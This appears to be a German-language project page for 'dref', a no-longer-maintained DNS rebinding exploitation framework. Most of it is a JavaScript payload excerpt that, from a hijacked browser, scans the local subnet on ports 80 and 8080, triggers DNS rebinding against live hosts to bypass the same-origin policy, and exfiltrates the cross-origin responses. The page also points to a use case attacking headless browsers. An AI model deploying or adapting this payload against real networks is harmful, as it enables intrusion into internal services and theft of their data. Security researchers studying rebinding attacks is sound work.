
DNS Rebinding Exploitation Framework
DNS-Rebinding-Exploitation-Framework
Dieses Projekt wird nicht mehr gewartet.
dref erledigt die schweren Aufgaben für das DNS-Rebinding. Der folgende Ausschnitt aus einem seiner integrierten Payloads zeigt, wie das Framework verwendet wird, um ein lokales Subnetz von einem gehackten Browser aus zu scannen; nachdem es aktive Webdienste identifiziert hat, exfiltriert es GET-Antworten und umgeht dabei die Same-Origin-Richtlinie:
// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)
// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}
// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}
Schauen Sie im Wiki vorbei, um loszulegen, oder werfen Sie einen Blick auf dref greift kopflose Browser an für einen praktischen Anwendungsfall.
Dies ist eine Entwicklungsversion – nicht für die Produktion geeignet